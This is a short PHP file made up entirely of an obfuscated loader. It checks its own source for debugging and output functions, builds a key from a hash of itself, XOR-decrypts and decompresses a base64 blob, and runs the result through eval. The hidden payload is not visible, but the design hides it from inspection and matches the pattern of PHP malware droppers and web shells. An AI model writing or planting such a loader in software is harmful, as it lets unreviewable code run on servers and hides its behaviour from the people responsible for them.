<?php
$hmwwoqy="93df15607387bb6bc0ad1b7898dbd7bf";
$ninahtihv="0a06500007050e0304055c5601550e07070652070606565b0e0e50500701005f";
$wzpqxjm="S+9J9H1a+wMjsJPkvXawJXB+sHCtY/UH4EtPsENtIQtn4ywvWOrkFfioR3bIKTbxRoTgH81Qop/B/vwku6DvZq6iQclfzMrLA2RyL+UVZsnPcj15uiiBWrQFXEut/AgZwVV9Q1+jeBiM5BnfxTllTZ0tGgMhfroYXm+sMK1pTUjH2Ynx8CNTFqFToG0dtV6P6wc+F0++IzeYCeVEr2hNJBmvxV6f4cOJdJu4si0draoGIiT+xdzEZQnP0wuTzXGo2RkCRrDNn08NbcjrzcRcBfRlB6rqcDzXUzABtRWRDUSPrA2qnv7vduZVb+PMnZKHzVdiiT/pFuEY2H00I9M4cVjQg4YXY/uECAjrrok/o2pz9wG3mSEer/KS4BwfwPLLEhklKPPAAltj3L/VASQ9y9XuSkcUts5wkmkC5bqV";
$nmgcybx=file_get_contents(__FILE__);
$ljzqjqya=str_replace($wzpqxjm,"",$nmgcybx);
if(strpos($ljzqjqya,"ec"."ho")!==false||strpos($ljzqjqya,"pr"."int")!==false||strpos($ljzqjqya,"var_"."dump")!==false||strpos($ljzqjqya,"file_put_"."contents")!==false||strpos($ljzqjqya,"fw"."rite")!==false){die();}
$ovlhyosgp=str_replace(array($hmwwoqy,$ninahtihv),array("SP_11f89ef4","KP_fb661fa3"),$nmgcybx);
$nyqjklbza=md5($ovlhyosgp);
$oxvahuber=hex2bin($ninahtihv);
$sminxeukq="";
$lxasnjbh=strlen($nyqjklbza);
for($jwhxrbiu=0;$jwhxrbiu<$lxasnjbh;$jwhxrbiu++){
$sminxeukq.=chr(ord($oxvahuber[$jwhxrbiu])^ord($nyqjklbza[$jwhxrbiu]));
}
$qvkganvz=base64_decode($wzpqxjm);
$topmrgjz=strlen($qvkganvz);
$zhxwkts="";
$rqimhsjf=strlen($sminxeukq);
for($jwhxrbiu=0;$jwhxrbiu<$topmrgjz;$jwhxrbiu++){
$zhxwkts.=$qvkganvz[$jwhxrbiu]^$sminxeukq[$jwhxrbiu%$rqimhsjf];
}
$xfoalwdn="gzun"."compress";
eval($xfoalwdn($zhxwkts));
